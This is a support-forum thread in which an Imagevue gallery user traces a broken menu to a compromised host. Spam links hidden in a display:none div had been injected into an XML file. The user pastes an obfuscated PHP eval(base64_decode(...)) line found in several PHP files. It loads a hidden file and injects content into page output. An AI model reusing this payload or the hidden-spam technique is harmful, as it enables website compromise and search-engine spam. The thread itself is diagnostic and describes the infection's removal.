Hi there,

I have installed the imagevue on my website and it was working properly, but today i realized my gallery is not working well.

Insted the regular names of my galleries on the menu i get the label "undefined" for all them.

The weird thing is that i didn't move anything on my server or imagevue configuration, so i think this could be related to some changes on my hosting server, but i would like to know if this is a known issue.

To reproduce this error go to: http://qbtrance.com/gallery/

Thank you so much 4 u'r help.
Best Regards!

Hi,

As far as i know i have no performed any change on any file or my imagevue admin configuration, that ´s why i think is a strange behavior. (i was on vacations when this ocurred).

As important as know how it happend is how to fix it, i followed the link you gave to me and i can see an XML error.

I reviewed the XML error throwed. The file is incomplete, the XML file is not properly closed and probably this is causing the trouble, i think re-uploading my files could fix it, but i would like not to lose my theme and gallery configurations.

The XML code ends :
Code
<text2>
          <enabled>false</enabled>
          <style>over_image_right</style>
          <event>rollover</event>
          <items>exif</items>
          <width>250</width>
          <margin>1</margin>
          <min_width>200</min_width>
          <scaleheight>min --------------------------

I cheked the configuration on the admin and it looks good, if i try to access de gallery as HTML i can see all the galleries well.

What do you think could fix this issue?
Thank ´s in advance.

Well, if you check the source from the file there, you will see line upon line with unrelated text, most likely SPAM. Either your server is adding some commercial scripts, or someone is messing with your server. In either case, Imagevue did NOT add any of that text ...

I actually did some further research into that XML. It starts with the tag:
Code
<div style="display:none">
... and then follows with lots of spam links to various sites. Finally, the imagevue XML code is there. If this was a normal HTML page, it would display fine because the SPAM code is hidden in the <div> tag above. However, since this is XML, it is corrupted by that text. The hidden spam text/links added will help promote those links in google. Now who has added this? Either you have a trojan infection in your site, or your server hosting company is extremely cheeky. The Imagevue files certainly don ´t add anything like that(feel free to view all the php source files). Of course we wouldn ´t have a script that would corrupt our own gallery either ...

mjau-mjau,

I think you're right, i was reviewing my site and the gallery isn ´t the only service affected, i found this line on the top of several php files:

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaGVybWVzL2Jvc3dlYi93ZWIyMDQvYjIwNDEvaXB3LnFidHJhbmNlL3B1YmxpY19odG1sL2dhbGxlcmllcy8yMDA3L3ZpZGVvcy8yMDA3L0F6dGVja1NvdW5kL3RoaXNJc05vdEFEcmVhbS9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL2hlcm1lcy9ib3N3ZWIvd2ViMjA0L2IyMDQxL2lwdy5xYnRyYW5jZS9wdWJsaWNfaHRtbC9nYWxsZXJpZXMvMjAwNy92aWRlb3MvMjAwNy9BenRlY2tTb3VuZC90aGlzSXNOb3RBRHJlYW0vc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRkKXskZj1vcmQoc3Vic3RyKCRkLDMsMSkpOyRoPTEwOyRlPTA7aWYoJGYmNCl7JGU9dW5wYWNrKCd2JyxzdWJzdHIoJGQsMTAsMikpOyRlPSRlWzFdOyRoKz0yKyRlO31pZigkZiY4KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYxNil7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYmMil7JGgrPTI7fSR1PWd6aW5mbGF0ZShzdWJzdHIoJGQsJGgpKTtpZigkdT09PUZBTFNFKXskdT0kZDt9cmV0dXJuICR1O319ZnVuY3Rpb24gZGdvYmgoJGIpe0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRjPWd6ZGVjb2RlKCRiKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkYykpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRjKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJGM7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>

Im not sure why this line was added to my scripts but i think this is causing the SPAM advertising.

I ´ll check this trouble with my server admin, thank you so much for your help and time, as soon as i get this fixed i ´ll let you know.

Thank you guys.

Your help was very usefull to push my hosting to get this fix.
The toruble was a malaware on the hosting server which was adding advertisments on my XML & PHP files, this way all the php scripts were blocked.

Now is working properly.
Thank ´s.
